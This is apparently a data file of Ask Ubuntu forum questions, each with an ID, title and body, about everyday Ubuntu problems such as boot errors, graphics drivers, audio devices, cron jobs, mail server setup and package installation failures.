406610	why my screen brightness adjusting is now working ?	ubuntu 13.10 screen brightness adjustment did n't work for a very long time so i could n't adjust the brightness of my screen . but now it just worked . i need to identify how was it fixed . i do n't remember i recently downloaded an update related to the screen brightness adjustment . i also recently installed xfce4 . here is a screenshot of my latest updates : could installing xfce4 be the reason to solve the screen brightness adjustment ?
406615	enable output audio on 2 devices ( ubuntu 13.10 )	i have an analog output ( jack ) and usb wireless headset , how could use both togheter ? because i ca n't just connect the headset cable to switch audio , on windows , i am used to keep em enabled and turn off headset for ear the speakers and put a cutted jack in the speaker volume manager device , to mute em . thank
406617	boot fail ubuntu hp110-210 amd64	i just obtained a second hp110 series computer . when i installed linux 12.04.3lts-64bit for amd , i now get the following : checking for media ... ... media found ... ... start pxe over ipv4 the computer will still boot from the linux disk , but i want it to boot from the hd . i have tried several reloads of the os and no go . head-desk ...
406618	unknown command hwmatch , installation error ?	yesterday i upgraded from ubuntu 12.04 to lubuntu 13.10 . when i installed it i upgraded so i could keep my stuff . when i clicked install it said there was no 1mb partition called boot loader . i thought that was just for people that dual booted , so i didnt do anything about it . so when it got done installing and it rebooted it said : error : unknown command hwmatch error : file not found error : file not found error : file not found press any key to continue ... everything starts and works just fine . the only problem is that all the applications i had installed through the repositories are gone . other than that i havent ' found any problems yet . i was just wondering if there is something wrong with my pc . is there ?
406619	boot is running fairly slow	i have completely reformatted my hd and made various partitions . my bios is in legacy mode so i created a partition for ubuntu to boot ( sda1 ) . a pop up message appeared when i went to save that asked me to create an efi partition for ubuntu to boot . i did and now it is taking quite a while to load . i ran boot repair . should i delete the efi partition ? http : //paste.ubuntu.com/6764562 also , i set my boot to `` ubuntu '' in my bios .
406622	kazam is not recording audio from logitech usb headset	i am trying to record a short screencast using kazam . unfortunately , it refuses to record sound from my logitech usb headset . the kazam preferences show only `` monitor* '' devices . what can i do to make it see the other recording devices ?
406623	cron not outputting correctly ?	please forgive my ignorance . i have searched , but perhaps i’m not sure really what to search for in order to answer my question myself , so i’m turning to this forum for a little guidance . i’ve stood up an ubuntu server 12.04.3 . this server is primarily running mysql . i am attempting to set up a job that will perform a daily dump . i am logged in as my own user , i have created an executable file called /home/xyz/mysql_dumps/runmysqldump -rwxrwxr-x 1 0 1000 1012 jan 15 15:26 runmysqldump crontab –l shows : 12 * * * * /home/xyz/mysql_dumps/runmysqldump contents of runmysqldump : mytimenow= $ ( date + '' % y % m % e_ % h % m '' ) mysqldump -- host=localhost -- user= < user > -- password= < password > -- max_allowed_packet=1g -- skip-opt -- port=3306 -- default-character-set=utf8 -- single-transaction=true -- dump-date=true -- comments -- flush-privileges -- force -- all-databases -- result-file=/home/xyz/mysql_dumps/ $ mytimenow-x.dump mysqldump -- host=localhost -- user= < user > -- password= < password > -- max_allowed_packet=1g -- skip-opt -- port=3306 -- default-character-set=utf8 -- single-transaction=true -- dump-date=true -- comments -- flush-privileges -- force -- all-databases -- result-file=/home/xyz/mysql_dumps/ $ mytimenow-y.dump mysqldump -- host=localhost -- user= < user > -- password= < password > -- max_allowed_packet=1g -- skip-opt -- port=3306 -- default-character-set=utf8 -- single-transaction=true -- dump-date=true -- comments -- flush-privileges -- force -- all-databases -- result-file=/home/xyz/mysql_dumps/ $ mytimenow-z.dump tar -cvf $ mytimenow-all.tar $ mytimenow*.dump gzip *.tar rm $ mytimenow*.dump so , here’s the problem i’m running up against . when i log into the server as my own user “xyz” and i manually run the command ./runmysqldump , everything works fine : /home/xyz/mysql_dumps -rw-rw-r -- 1 1000 1000 1042848433 jan 15 14:03 20140114_0310-all.tar.gz -rw-rw-r -- 1 1000 1000 1065212917 jan 15 15:18 20140115_1512-all.tar.gz -rw-rw-r -- 1 1000 1000 1065718672 jan 15 16:28 20140115_1622-all.tar.gz -rw-rw-r -- 1 1000 1000 1077965846 jan 16 11:42 20140116_1136-all.tar.gz however , when i let cron run the job , this is what i get : /home/xyz ( note : not in /home/xyz/mysql_dumps and no data ! ) -rw-rw-r -- 1 xyz xyz 67 jan 16 16:12 20140116_1612-all.tar.gz can someone please point me in the right direction ? thanks immensely !
406624	launcher auto-hide leaves a dark bar , does n't display properly	i am using ubuntu 13.10 , i have alienware . it has nvidia-optimus but ubuntu is able to boot up if install it in uefi mode . i have tried to auto-hide the launcher both with and without bumblebee but neither approach works . i put up links to the images since i do n't have 10 reputation yet . http : //postimg.org/image/kf7gkt73j/ http : //postimg.org/image/ajnsdukhv/ i 'm not sure why this is happening or what i should do . i might have to change something on graphics display but not sure what . i can provide anymore info upon request . thanks in advance .
406631	upgraded to 13.10 and files are gone but showed up in search	i upgraded to 13.10 and everything was erased . i chose the upgrade option to `` keep my personal files '' and i was able to find one by searching . it was a document but was not in the new documents folder . so are the files still out there ? where are they ? can they get them back ?
406637	xorg freezes randomly 12.04	ubuntu runs on my laptop for about a week and everything works fine , except that the ( i guess ... ) xorg freezes/crashes sometimes . but when i hit ctrl+alt+f1 the terminal comes up and when i hit ctrl+alt+f7 everything works again . laptop : lenovo z500 , i5-3230m , nvidia geforce gt 740m , 8gb ram using the nvidia driver ( 319-update ) xorg log : [ 25468.920 ] reporting 3 4 28 201 [ 25478.075 ] reporting 3 4 28 201 [ 25572.198 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 25572.199 ] ( ii ) nvidia ( 0 ) : setting mode `` nvidia-auto-select '' [ 25572.199 ] ( ee ) nvidia ( 0 ) : failed to initiate mode change . [ 25572.199 ] ( ee ) nvidia ( 0 ) : failed to complete mode change [ 25572.220 ] ( ii ) modesetting ( g0 ) : edid vendor `` sdc '' , prod id 17746 [ 25572.220 ] ( ii ) modesetting ( g0 ) : printing ddc gathered modelines : [ 25572.220 ] ( ii ) modesetting ( g0 ) : modeline `` 1366x768 '' x0.0 72.33 1366 1414 1446 1526 768 770 775 790 -hsync -vsync ( 47.4 khz ep ) [ 25572.337 ] ( -- ) synaptics : synps/2 synaptics touchpad : touchpad found [ 25709.148 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 25709.149 ] ( ii ) nvidia ( 0 ) : setting mode `` nvidia-auto-select '' [ 25709.149 ] ( ee ) nvidia ( 0 ) : failed to initiate mode change . [ 25709.149 ] ( ee ) nvidia ( 0 ) : failed to complete mode change [ 25709.168 ] ( ii ) modesetting ( g0 ) : edid vendor `` sdc '' , prod id 17746 [ 25709.168 ] ( ii ) modesetting ( g0 ) : printing ddc gathered modelines : [ 25709.168 ] ( ii ) modesetting ( g0 ) : modeline `` 1366x768 '' x0.0 72.33 1366 1414 1446 1526 768 770 775 790 -hsync -vsync ( 47.4 khz ep ) [ 25709.300 ] ( -- ) synaptics : synps/2 synaptics touchpad : touchpad found [ 25839.764 ] reporting 3 4 28 201 [ 25924.425 ] reporting 3 4 28 201 thanks for help
406639	ubuntu not working properly on the new lenovo x1 carbon	i 've recently changed my lenovo thinkpad x1 carbon gen1 ( it broke : s ) . but since i liked it so much i changed it into the `` new lenovo thinkpad x1 carbon '' http : //shop.lenovo.com/us/en/laptops/thinkpad/x-series/x1-carbon/ . i had ubuntu installed and working flawlessly on the old thinkpad , but once i tried to download it on my new laptop lots of bugs started occuring . things like the wireless was n't being recognized , not being able to boot back up after going to sleep etc ... i 'm not really tech-savvy so i did n't really analyze the hardware when i bought it , but i assumed that hardware-wise , it would n't be much different . does anybody here definitively know whether or not ubuntu is just not compatible with the new x1carbon ? or did i do something wrong/miss something while installing ?
406640	boot from usb syslinux error	i am trying to boot linux from a usb created through using the universal usb installer . when i try to boot my laptop ( hp pavilion g6 series ) displays : syslinux 4.07 edd 2013 - 07 - 25 copyright ( c ) 1994 - 2013 h. peter anvin et al i have used this same usb on a different system and it did boot correctly . any help is very appreciated , thanks .
406641	how to create a new user without home directory and with specific uid	how can i add a new user `` kids '' with uid = 500 and without home directory with adduser command in terminal ? i 'm trying this : sudo adduser -- no-create-home -- uid id 500 kids and after correctly entering password it says that value `` id '' is invalid for option uid . then i have tried the same thing only without `` id '' and got : please enter a username matching the regular expression configured via the name_regex [ _system ] configuration variable . use the ` -- force-badname' option to relax this check or reconfigure name_regex .
406642	how to enable system-ready drum sound back in ubuntu precise ?	in somehow my system ready drum sound disabled . unlike everyone , i like it and i want it back in my ubuntu 12.04 ? how can i get it back ? p.s . below topics did not helped me : how can i enable the system ready sound in ubuntu 12.04 ? here no sound other then drumming ! here
406643	warning : you do n't have < a directory > in your path , gem executables will not run	i installed a tools package my friend recommended and this is what i keep getting when i try to upgrade . my system has also started freezing after i installed the tools . ryan1 @ ryan1 : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y \setting up wpscan ( 1.1-bt3 ) ... warning : you do n't have /home/ryan1/.gem/ruby/1.9.1/bin in your path , gem executables will not run . successfully installed mime-types-2.0 1 gem installed installing ri documentation for mime-types-2.0 ... installing rdoc documentation for mime-types-2.0 ... warning : you do n't have /home/ryan1/.gem/ruby/1.9.1/bin in your path , gem executables will not run . building native extensions . this could take a while ... error : error installing typhoeus : error : failed to build gem native extension . /usr/bin/ruby1.9.1 extconf.rb /usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36 : in `require ' : can not load such file -- mkmf ( loaderror ) from /usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36 : in `require' from extconf.rb:4 : in ` < main > ' gem files will remain installed in /home/ryan1/.gem/ruby/1.9.1/gems/ffi-1.9.3 for inspection . results logged to /home/ryan1/.gem/ruby/1.9.1/gems/ffi-1.9.3/ext/ffi_c/gem_make.out warning : you do n't have /home/ryan1/.gem/ruby/1.9.1/bin in your path , gem executables will not run . successfully installed xml-simple-1.1.3 1 gem installed installing ri documentation for xml-simple-1.1.3 ... installing rdoc documentation for xml-simple-1.1.3 ... /var/lib/dpkg/info/wpscan.postinst : line 7 : svn : command not found dpkg : error processing wpscan ( -- configure ) : subprocess installed post-installation script returned error exit status 127 errors were encountered while processing : wpscan e : sub-process /usr/bin/dpkg returned an error code ( 1 )
406646	how do i create a new partition on my hard drive ?	i just got a copy of windows xp , and i want to put it on my hard drive along side ubuntu . how do i create/re size the partitions on my hard drive ?
406651	keyboard shortcuts are unreliable	running natively , i 'm noticing often that ubuntu keyboard shortcuts for things like workspace switching and terminal are unreliable - that is , sometimes they have no effect and it will stay that way for several tries until i click around or something and try again . and this is with or without any applications running , or maybe just nautilus and/or chrome . what might be causing this ? what package does this kind of behavior relate to ? besides basic machine specs , what type of details would help the package maintainers actually address this problem ? thanks !
406653	how do i use an aoc monitor with a late 2009 imac running ubuntu 12.04 ?	when i go to system settings > displays it detects my aoc monitor but the monitor never actually receives the video input it seems . it just says `` no video signal '' . i use a minidisplayport to hdmi adapter to connect my imac to the aoc monitor . i 'm not sure on what to do now .
406657	ubuntu 13.10 : wireless networks do n't show up , touchpad and speakers do n't work	i recently switched my laptop ( sony vaio ) to full on ubuntu . i used to run linux as a dual boot with windows 7 . yesterday when i installed it i was able to connect to the internet wirelessly just fine . most of the options under internet connections are grayed out . i 've found many similar threads but nothing i 've seen works . sudo lshw -class network says -network unclaimed above my wireless card , which it correctly identifies by name and model rfkill list : mentions my bluetooth adapter , nothing else my touchpad and speakers also do n't work . how do i get them running again ? thanks . edit : fixed it by reinstalling ubuntu . hopefully this wo n't happen again .
406658	autostart synergy on boot working until i mouse click	so just as the title says , synergy is autostarting on boot . my mouse works but as soon i clicked in the password box to login , i lose all functions of the mouse . i 'm currently using the 12.04 lts version . windows 7 is the server and ubuntu is the client . i 've followed the instructions here ( using the lightdm instructions as noted ) though . any suggestions on what would cause my mouse functions to freeze ?
406659	installed ubuntu server by mistake and not ca n't boot into windows	i am new to linux and it so far has been a disaster for me . i installed ubuntu server instead of desktop . i installed it onto a hard drive that does n't have windows installed on it . now when i boot the machine up it goes to ubuntu server and will not allow me to get into windows . if i remove the hard drive that has the server on it i am able to boot into windows . the biggest issue is i have a lot of other programs on that hard drive that has ubuntu . is there anyway i can fix this without losing the whole hard drive ?
406661	how i remove windows xp and install ubuntu ?	i have an old pc intel p4 2.6ghz 1gb ram 80gbhdd.i want to remove windows xp professional and install ubuntu ( i downloaded ubuntu 12.04.1 ) .if it is possible i would like you to show me what to do step by step.thank you .
406663	postfix fails to create maildir	i 'm configuring a virtual squirrelmail for a school assignment . now i configured a dns server and all my dig 's and nslookups succeed . i was also able to add a user in terminal and send an email from usera to userb using telnet . now i added home_mailbox = maildir/ mailbox_command = to my the existing config which is this hostname = mail.gijswebsite.be alias_maps = hash : /etc/aliases alias_database = hash : /etc/aliases mydestination = localhost.localdomain mail. $ mydomain localhost gijswebsite.be relayhost = mynetworks = 127.0.0.0/8 192.168.206.0/24 mailbox_size_limit = 0 recipient_delimiter = + inet_interfaces = all default_transport = error relay_transport = error mydomain = gijswebsite.be myorigin = $ mydomain but the maildir folder for all the new userc is not created , although it is still possible to send a mail from the usera to the userb account and visa versa using the squirrelmail interface . when i try to login with the new userc using squirrelmail i get the error connection dropped by imap server when i go back to the console and check /etc/passwd , i see that usera , userb and the new userc are in this list . so i think it is not a mail or dns problem because it goes whitout any problems for the excisting users . i search myself a headache but cant find a fix for this problem . does someone know why this happened ? regards ,
406664	installing ubuntu for the first time , purple screen of death	today i went out and bought myself a 1.5 tb external hard drive with the intentions of using it for ubuntu , possibly running a server with ubuntu server and using this hard drive as opposed to the hard drive in the computer already that has some damage ( it still works it 's just not in the best condition plus it 's capacity is only 80 gb . ) the problem i 'm having is when i select either windows 7 or ubuntu ( ubuntu obviously ) it takes me to a purple screen with two options : `` ubuntu , with linux '' and `` ubuntu , with linux recovery console '' . when i select the first one i just get a purple screen , when i select the second one i get a black screen with a ton of white command lines attempting to install ( so i 'm assuming ) drivers and whatever else recovery console is supposed to do ( i have n't really messed around with ubuntu or linux in general much at all . ) i 'd really like to be able to troubleshoot this successfully , thank you for taking the time to read this .
406668	public key issue	every time i want to push to github i get this error . $ git push permission denied ( publickey ) . fatal : the remote end hung up unexpectedly then i have to ssh-add , but it does n't work either . $ ssh-add ~/.ssh/github_rsa could not open a connection to your authentication agent . i have to do $ eval `ssh-agent -s` first and then ssh-add and then git push . what should i do to fix this ?
406669	is it possible to limit software center or apt-get install downloading to a specific time of day ?	i have free bandwidth everyday from 12 am till 7 am . that means i put everything that i want to download in the software center and go to sleep . i want the download process to stop at 7 am . for that i have downloaded a tool that you can find in the software center called complexshutdown . it shuts down the pc . that is not a good idea , software can be corrupted . is there a better way to cancel or pause apt or software center at a certain time ? that can easily be done in torrent downloaders or download managers , but sometimes , i am obliged to use apt or the software center . i prefer the software center simply because i can schedule apps to be installed . i do n't know if that can be done with apt , well maybe & & but not very convenient .
406673	new to linux - need suggestions on hardware that is compatiable	i want to either build a tower or use my lenovo ts130 server with ubuntu . my goal is to do raid 1 on the tower and install ubuntu . the purpose of this machine is to use it as a file server for my computer store so when my clients bring there computer in , i can somehow access the linux server by going to my clients browser and typing in `` //b `` then it would pull up the shared drives on the linux machine . from there i want to be able to copy and paste files from my customers windows machines so i can have a backup before i reinstall their operating system . does anyone know if the lenovo ts130 will be compatiable with raid 1 on ubuntu ? if not is there a machine i can build for like $ 300 to $ 500 excluding hard drives that will run fast . again my goal is to use this as a network file server so i can copy and paste files onto it to backup my clients information . my goal is to achieve fast local network speed so i am not waiting hours to transfer data on my network .
406675	kill -9 process i 'd is failing	i upgraded from version 13 to the latest 13.10 and i am trying to kill my freeradius process . after killing the process somehow the process is being restarted and not allowing me to kill the process . any ideas where to look to correct this issue . thanks scott
406678	how do you switch from chrome os to ubuntu	i got ubuntu on my samsung chromebook but when i turn it off and back on i do n't see ubuntu again.i tried using youtube to look for solution but they did n't work
406682	blank screen after trying to install nvidia proprietary drivers	i tried to install the nvidia-331 drivers but as usual it does n't want to work ... i get a blank screen when i boot up . i tried the instructions here blank screen after installing nvidia restricted driver but that did n't help i was actually able to load the driver with jockey-text and startx worked , but obviously no unity or any windowing ... i started it from recovery mode . hopefully someone can help before i have to reinstall the os again.. sigh
406687	installing ubuntu with xfx radeon 6570 graphics card ?	i 'm running windows 7 right now and want to dual boot with ubuntu , but when i go to install ubuntu , its like the screen messes up . how do i install or run the graphics driver when i go to install ? my motherboard does n't have a integrated video card .
406688	my server unable to reach https port 443 urls behind proxy	i have set up a 12.04 lts ubuntu headless server 64 bit . this is my network interfaces # the loopback network interface auto lo iface lo inet loopback # the basic eth0 network interface auto eth0 # iface eth0 inet dhcp # static ip iface eth0 inet static address 146.11.90.234 netmask 255.255.255.0 gateway 146.11.90.1 dns-nameservers 146.11.115.200 i can do ping www.google.com from inside the server . however , i am unable to access https repositories when i try to use composer . i know the proxy server allows me to use all protocols via www.xxxx.com:8080 please advise .
406690	is there any pay what you want option ?	hay so i published an app and i do n't want to charge for it but i want people to be able to pay if they want . so i am wondering if there is a pay what you want option . thanks
406693	cifs mounted windows share manually refresh	after a night of messing around to get my ubuntu in my windows domain with acces to shared files i come to you with another problem ; when i for example make a .txt file in the windows server and swap to my ubuntu client , i have to manualy refresh the mounted folder with f5 . my question : is it possible to have the mount folder update in real time without doing it manualy with f5 ? thanks in advance < 3
406695	ubuntu virtual machine - parallels	i downloaded parallels and created a linux virtual machine . after downloading it , all of my desktop files appeared on the virtual machine . it was basically like a mirror image of my actual desktop.. when i dragged a file from the desktop of my linux virtual machine , it took my actual desktop 's file and put it in the trash as well . i used the pre-configured `` download ubuntu free '' button on parallels and just clicked `` download '' . is it normal for this to happen ? it was just brought to my attention that the default settings shares all your files with the vm ( if you give it permission to ) , so it is probably to be expected . how can you change this though - for when i download it again ? thank you !
406699	can i adjust hard drive space without re-installing ubuntu ?	i set up a partition of about 200gb and installed ubuntu from a usb stick . when i run `` free -g '' from the command line i only see 5 gb of total space . during the installation i clicked install along side windows but was never asked about partition space , which i thought was weird . do i have to re-install ubuntu to fix this ? if this is true , i did try rebooting with the usb stick in , but it was not recognized during the boot process .
406702	parse_rackup_file ' : rackup file ( config.ru ) not readable ( argumenterror ) unicorn nginx	i used the one-click rails , nginx , unicorn , mysql droplet set up to create my server and i ca n't get unicorn to start as a daemon . here 's the stack trace when i /etc/init.d/unicorn start : /usr/local/rvm/gems/ruby-2.0.0-p195/gems/unicorn-4.8.0/lib/unicorn/configurator.rb:659 : in `parse_rackup_file ' : rackup file ( config.ru ) not readable ( argumenterror ) from /usr/local/rvm/gems/ruby-2.0.0-p195/gems/unicorn-4.8.0/lib/unicorn/configurator.rb:77 : in `reload' from /usr/local/rvm/gems/ruby-2.0.0-p195/gems/unicorn-4.8.0/lib/unicorn/configurator.rb:68 : in `initialize' from /usr/local/rvm/gems/ruby-2.0.0-p195/gems/unicorn-4.8.0/lib/unicorn/http_server.rb:100 : in `new' from /usr/local/rvm/gems/ruby-2.0.0-p195/gems/unicorn-4.8.0/lib/unicorn/http_server.rb:100 : in `initialize' from /usr/local/rvm/gems/ruby-2.0.0-p195/gems/unicorn-4.8.0/bin/unicorn:126 : in `new' from /usr/local/rvm/gems/ruby-2.0.0-p195/gems/unicorn-4.8.0/bin/unicorn:126 : in ` < top ( required ) > ' from /usr/local/rvm/gems/ruby-2.0.0-p195/bin/unicorn:23 : in `load' from /usr/local/rvm/gems/ruby-2.0.0-p195/bin/unicorn:23 : in ` < main > ' from /usr/local/rvm/gems/ruby-2.0.0-p195/bin/ruby_executable_hooks:15 : in `eval' from /usr/local/rvm/gems/ruby-2.0.0-p195/bin/ruby_executable_hooks:15 : in ` < main > ' when i which unicorn i get : /usr/local/rvm/gems/ruby-2.0.0-p195/bin/unicorn which seems like it should be good . i 've tried everything i can think of , some of which include : creating an rvm wrapper = > no bin path suitable for lining wrapper . try setting 'rvm_bin_path ' . sudo gem install unicorn = > failed to build native extensions ... ( for kgio 2.8.1 ) . it 's looking in/usr/bin/ruby1.9.1` for extconf.rb . i 've never even touched a version of ruby lower than 2.0. rvm remove 2.0.0-p353 = > a bunch of file permissions errors . rvm does n't recognize what sudo means either . beats me ... contacting digitalocean = > they said to go ask 'the community ' . followed several other tutorials & suggestions about symlinking , putting path-related information in config files , and more . nothing worked . it works fine if i start it in the background ( -d switch ) , but the processes still get killed once i disconnect from the terminal . i 'm simply out of ideas and have been at this for two days . let me know if you want me to post any snippets of files or run commands . i did n't want to fill this post with superfluous information . help me , askubuntu , you 're my only hope ... *edit : * /etc/init.d/unicorn set -e name=unicorn desc= '' unicorn web server '' . /lib/lsb/init-functions if [ -f /etc/default/unicorn ] ; then . /etc/default/unicorn fi export path=/usr/local/rvm/gems/ruby-2.0.0-p195/bin : $ path export gem_home=/usr/local/rvm/gems/ruby-2.0.0-p195 export gem_path=/usr/local/rvm/gems/ruby-2.0.0-p195 : /usr/local/rvm/gems/ruby-2.0.0-p195/gems : /usr/local/rvm/gems/ruby-2.0.0-p195 @ global/gems daemon=/usr/local/rvm/gems/ruby-2.0.0-p195/bin/unicorn pid= $ { pid-/run/unicorn.pid } run_by_init ( ) { ( [ `` $ { previous- } '' ] & & [ `` $ { runlevel- } '' ] ) || [ `` $ { runlevel- } '' = s ] } exit_with_message ( ) { if ! run_by_init ; then log_action_msg `` $ 1 not starting . '' fi exit 0 } check_config ( ) { if [ $ configured ! = `` yes '' ] ; then exit_with_message `` unicorn is not configured ( see /etc/default/unicorn ) . '' fi } check_app_root ( ) { if ! [ -d $ app_root ] ; then exit_with_message `` application directory $ app_root is not exist . '' fi } set -u case `` $ 1 '' in start ) check_config check_app_root log_daemon_msg `` starting $ desc '' $ name || true if start-stop-daemon -- start -- quiet -- oknodo -- pidfile $ pid -- exec $ daemon -- $ unicorn_opts ; then log_end_msg 0 || true else log_end_msg 1 || true fi ; ; stop ) log_daemon_msg `` stopping $ desc '' $ name || true if start-stop-daemon -- stop -- signal quit -- quiet -- oknodo -- pidfile $ pid ; then log_end_msg 0 || true else log_end_msg 1 || true fi ; ; force-stop ) log_daemon_msg `` forcing stop of $ desc '' $ name || true if start-stop-daemon -- stop -- quiet -- oknodo -- pidfile $ pid ; then log_end_msg 0 || true else log_end_msg 1 || true fi ; ; restart|force-reload ) log_daemon_msg `` restarting $ desc '' $ name || true start-stop-daemon -- stop -- quiet -- oknodo -- pidfile $ pid sleep 1 if start-stop-daemon -- start -- quiet -- oknodo -- pidfile $ pid -- exec $ daemon -- $ unicorn_opts ; then log_end_msg 0 || true else log_end_msg 1 || true fi ; ; reload ) log_daemon_msg `` reloading $ desc '' $ name || true if start-stop-daemon -- stop -- signal hup -- quiet -- oknodo -- pidfile $ pid ; then log_end_msg 0 || true else log_end_msg 1 || true fi ; ; reopen-logs ) log_daemon_msg `` relopening log files of $ desc '' $ name || true if start-stop-daemon -- stop -- signal usr1 -- quiet -- oknodo -- pidfile $ pid ; then log_end_msg 0 || true else log_end_msg 1 || true fi ; ; status ) status_of_proc -p $ pid $ daemon $ name & & exit 0 || exit $ ? ; ; * ) log_action_msg `` usage : $ 0 < start|stop|restart|force-reload|reload|force-stop|reopen-logs|status > '' || true exit 1 ; ; esac /etc/default/unicorn # change parameters below to appropriate values and set configured to yes . configured=yes # default timeout until child process is killed during server upgrade , # it has *no* relation to option `` timeout '' in server 's config.rb . timeout=60 # path to your web application , sh'ld be also set in server 's config.rb , # option `` working_directory '' . rack 's config.ru is located here . app_root=/home/rails/current/ # server 's config.rb , it 's not a rack 's config.ru config_rb=/home/unicorn/unicorn.conf # where to store pid , sh'ld be also set in server 's config.rb , option `` pid '' . pid=/home/unicorn/pids/unicorn.pid unicorn_opts= '' -d -c $ config_rb -e production '' path=/usr/local/rvm/rubies/ruby-2.0.0-p195/bin : /home/unicorn/.rvm/bin : /usr/local/sbin : /usr/bin : /bin : /sbin : $ ~ edit 2 : success ! a long trail of chowns and chmods later ( for different unicorn log & pid files ) , i 'm simply got a master failed to start , check stderr log for details when i try to /etc/init.d/unicorn/ but my unicorn.stderr.log file is blank . tracing more config files , lead me to some error log that said some unicorn/pid/ directory was unwritable . a little chown action later , all is well . thanks ben !
406703	package 'flex ' has no installation candidate in ubuntu 13.04	when am trying to install flex in ubuntu 13.04 -sudo apt-get install flex am getting an error like this- reading package lists ... done building dependency tree reading state information ... done package flex is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'flex ' has no installation candidate . and when am doing sudo apt-get update this is showing errors as follows : err security.ubuntu.com raring-security release.gpg something wicked happened resolving 'security.ubuntu.com : http ' ( -11 - system error ) err in.archive.ubuntu.com raring release.gpg so mething wicked happened resolving 'in.archive.ubuntu.com : http ' ( -11 - systemerror ) err extras.ubuntu.com raring release.gpg something wicked happened resolving 'extras.ubuntu.com : http ' ( -11 - system error ) err extras.ubuntu.com raring/main sources err extras.ubuntu.com raring/main amd64 packages err extras.ubuntu.com raring/main i386 packages err extras.ubuntu.com raring/main translation-en_in err extras.ubuntu.com raring/main translation-en err security.ubuntu.com raring-security/main sources err security.ubuntu.com raring-security/restricted sources err security.ubuntu.com raring-security/universe sources err security.ubuntu.com raring-security/multiverse sources err security.ubuntu.com raring-security/main amd64 packageserr security.ubuntu.com raring-security/restricted amd64 packages err security.ubuntu.com raring-security/universe amd64 packageserr security.ubuntu.com raring-security/multiverse amd64 packageserr security.ubuntu.com raring-security/main i386 packageserr security.ubuntu.com raring-security/restricted i386 packageserr security.ubuntu.com raring-security/univer w : failed to fetch in.archive.ubuntu.com/ubuntu/dists/raring-backports/universe/âś something wicked happened resolving 'in.archive.ubuntu.com : http ' ( -11 - system error ) e : some index files failed to download . they have been ignored , or old ones used instead .
406706	new user compiling ?	so this is my first time trying to compile a source code ... i downloaded subversion ( no problems ) , added the svn repositry ( with no directory ( facepalm ) ) using code svn checkout http : //svn.gib.me/public/borderlands2/trunk/ and it seems to have worked ( no error messages files all look good ) but i do n't know what to do next ... i read all the compiling threads i say on here and they all say read the read me and then try it out ... if someone could look at it and explain it to me i would apriciate it ... i do n't like asking for help or failing and its looking like both right now ... sorry do n't know if i should of added it in the first place but the program i want is gibbed borderlands 2 save editor ... i ca n't tell if theres more then one program there or not ... also i know the program was made for windows but i belive thats what source codes are for is to use them on opensource software ... ( hopefully )
406707	problem with btrfs tools	i 've installed btrf-tools and i would like to shrink 5gb off my primary partition for use as a temporary snapshot for a dd backup . but first things first ... me @ my : ~ $ btrfs fi show failed to open /dev/sda : permission denied failed to open /dev/sda1 : permission denied failed to open /dev/sdb : permission denied failed to open /dev/sdb1 : permission denied failed to open /dev/sdb2 : permission denied failed to open /dev/sdb5 : permission denied failed to open /dev/sdc : permission denied failed to open /dev/sdc1 : permission denied failed to open /dev/dm-0 : permission denied failed to open /dev/dm-1 : permission denied btrfs v0.20-rc1 me @ my : ~ $ sudo btrfs fi show btrfs v0.20-rc1 me @ my : ~ $ sudo btrfs fi df /dev/sdb1 error : could n't get space info on '/dev/sdb1 ' - inappropriate ioctl for device these are not the outputs i expect . you see that when i am not root , i get permissions errors . when i am root , i get nothing . ( i assume `` btrfs v0.20-rc1 '' is not a device/mount , but just a traditional banner ( footer ? ) . ) what 's going on ? thanks ! here 's what gparted shows @ grumbel brings up a good point ! maybe i do n't have btrfs at all . i am really certain that i selected it during installation because it seemed to be the newfangled thing over ext4 . only thing i can think is that also checking lvm overrode the filesystem choice ? ? cat /etc/fstab says # < file system > < mount point > < type > < options > < dump > < pass > /dev/mapper/ubuntu -- vg-root / ext4 errors=remount-ro 0 1 so i guess i 'm not on what i thought i was on .
406709	ubuntu not installing , please help	i bought lenovo laptop couple of days ago , it comes with original windows 8 . i formatted the entire hard disk and installed windows 8.1 pro instead and made 4 partitions file systems - primary . c - primary . d , e , f - logical extended partitions . i left about 40gb space to install ubuntu 12.04 lts ... i disabled fast boot , i chose legacy boot from the bios ... i put the ubuntu on the flash drive and loaded loaded into the live mode successfully , i start the installation and i have two options for the partitioning erase everything something else i click on something else and it shows my entire hard disk and it is empty 1tb free space . it does not see the windows at all . if i close the installation and go through the folders i can navigate to the windows partitions normally , the gparted shows only hard disk and it is free too . so i can not install it ... it is driving me crazy for the past three days ... i tried different versions of ubuntu 12.04 lts , 13.10 ... 32bits ... 64bits and all the same thing . please please please help me . oh the hard disk is 1tb hdd - 8gb ssd ( hybrid disk ) . thank you very much in advance .
406714	sha1sum mismatch ! clerification	i just started using ubuntu , and i 'm trying to get wine up and running . by using winetricks i 'm trying to install some software and i keep getting this error message : http : //i.imgur.com/l65jhsa.png it says '' sha1sum mismatch ! rename /home/jaken/.cache/winetricks/flash/install_flash_player_10_active_x_.exe and try again '' i do n't know what it wants me to rename . i 'm confused by this error screen . could anyone shed some light on an ubuntu noob ?
406716	no os 's showing in bios	i installed ubuntu and deleted windows off my pc but now when i boot up the pc the bios is not detecting any os is installed . i installed ubuntu by wubi then turned it to full install .
406718	unable to detect samsung galaxy s4 on adb on vbox	i have installed ubuntu 13.04 as guest os on windows 7 using vbox . am trying to run cts on ubuntu on samsung galaxy s4 . but am facing a problem . when the device reboots for a while adb is able to detect the device but after few minutes the device is shown as ? ? ? ? ? ? ? offline and if i leave it for some more time the device disappears . the android version on my samsung is 4.2.2 . i have seen this issue only on the virtual box .
